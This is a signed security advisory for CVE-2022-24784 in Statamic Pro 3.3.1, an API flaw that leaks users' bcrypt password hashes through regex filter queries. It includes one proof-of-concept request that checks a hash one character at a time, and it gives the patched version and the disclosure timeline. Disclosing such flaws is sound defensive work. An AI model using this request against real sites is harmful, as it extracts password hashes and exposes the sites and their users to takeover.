-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-022 Product: Statamic Pro Manufacturer: Statamic Affected Version(s): 3.3.1 and before Tested Version(s): 3.3.1 Vulnerability Type: Exposure of Sensitive Information Through Data Queries (CWE-202), Observable Response Discrepancy (CWE-204) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2022-03-18 Solution Date: 2022-03-18 Public Disclosure: 2022-03-30 CVE Reference: CVE-2022-24784 Author of Advisory: Thibaud Kehler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Statamic is an open-source content management system (CMS) written in PHP. The manufacturer describes the product as follows (see [3]): "Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites." Due to insufficient access control in the API's filter and sorting functionality, information is leaked about restricted fields. This side channel can be used by an attacker to extract sensitive information. The resource 'users' discloses the password hash value, thus enabling offline password-guessing attacks on the passwords. If one user has set an insecure password, this attack could lead to a defacement of the website managed by Statamic and cross-site scripting attacks on its users. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Pro version of Statamic provides an additional API for accessing the content of the CMS. The API and the respective resources have to be activated in the configuration file 'config/statamic/api.php': 'enabled' => true, 'resources' => [ ... 'users' => true, ... ], Although the resources may limit access to a set of attributes, other attributes can still be queried in the URL parameters 'filter' and 'sort'. More information on these query parameters can be found in the online documentation of Statamic 3.[2] Specially crafted requests can disclose one character of a restricted attribute. Repeated requests eventually reveal the complete content of that attribute. In particular, the attribute 'password' of the resource '/api/users' is vulnerable to that attack, disclosing the bcrypt password hash values of the CMS users. If one user has set an insecure password, this attack could lead to a defacement of the website managed by Statamic and cross-site scripting attacks on its users. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following HTTP GET request can be used to check whether the bcrypt hash of the user account with the name 'superuser' contains the capital letter 'M' at the 5th position after the prefix '$2y$10$'. http://hostname/api/users`?filter[name]=superuser&filter[password:regex]=\$2y\$10\$(%3f-i)....M................................................$ The request uses the regural expressions described in the documentation of Statamic 3.[3] If the regular expression matches the password hash, the response contains the user object of the queried user: "data":[ { "id":"c9b96376-a4ef-4257-93df-3ab78f5911dc", "email":"test@example.com", "name":"superuser", "is_super":true, "api_url":"http:\/\/project\/api\/users\/c9b96376-a4ef-4257-93df-3ab78f5911dc" } ], Otherwise, the data array is empty: "data":[], Extracting a complete user's password hash takes around one hour, as request throttling is activated by default. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install version 3.3.2 or newer. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-03-16: Vulnerability discovered 2022-03-18: Vulnerability reported to manufacturer 2022-03-18: Patch released by the manufacturer 2022-03-25: CVE-2022-24784 assigned 2022-03-30: Public disclosure of the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Statamic 3 documentation for the REST API https://statamic.dev/rest-api [2] Statamic 3 documentation for filter conditions https://statamic.dev/conditions [3] Product website for Statamic https://statamic.com [4] SySS Security Advisory SYSS-2022-022 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-022.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: thibaud.kehler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc Key ID: 0xB645 7D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmJBd3oACgkQ6ceYZrZF fXpjxQ/+LWo2BEYHq4lLkMWlb+Ul3OM90gBfuj/1kHmsKdEHTRYEETmszyfGYw9O E0rRYukMtD8uRVBusjtCgGuCo4KjrA73iahUteaTfS2aO+5sjErg8nhFKdvzAcxt tgHrSxzVnkBL5r6z1SU0lK5aS56pVb3ZEeBv6/HIsM8w4XKRtZGX+1dCTzpaJkVG l0OaLhI45hCG9oVKPcJsb1qLxPKmMxkrxEagWzurVAfMpJ6Dgecj8nzArifbf2Od /MA+0b+lHJR5uHbaRSl/PSc04R5JXhbvdzKZr7FX8/VgJhae8rb1vLA9F7D+AqYV qEtQ1NzAMMQg4DEdo4gpgcxQcXspHq87rAoRsNprA+zik+J5Kj4bP7CpqtQAHWRb WhnVnbkvAYKoNYLTSFP9fH2D+kQFh+AsdMq5NP5Uykxrbyi+070NxnH0KhMFlebY pGI3CUl3HxUnCnd0VY87YNfyjXXsYbFvhZxFvlIpjkRXeEyUc7pjtvZ14givrYd4 qhDE5ahMpqNFSGLNzcU/DMOhDE0/u0ezYqNOB8WZuqUivVVXMRhEg5hGjxX+F02/ Cywm6xuEQFo4VIYBS6VFEVKSiz0ceXWNmWxTF6VXqxnDegKXQvueZiwZVD0dDT6W RwKKk1A10v/zNG2h95NOL80OnZzUDZYB0LmOwB9LEdWW9ZAJj9k= =dlSj -----END PGP SIGNATURE-----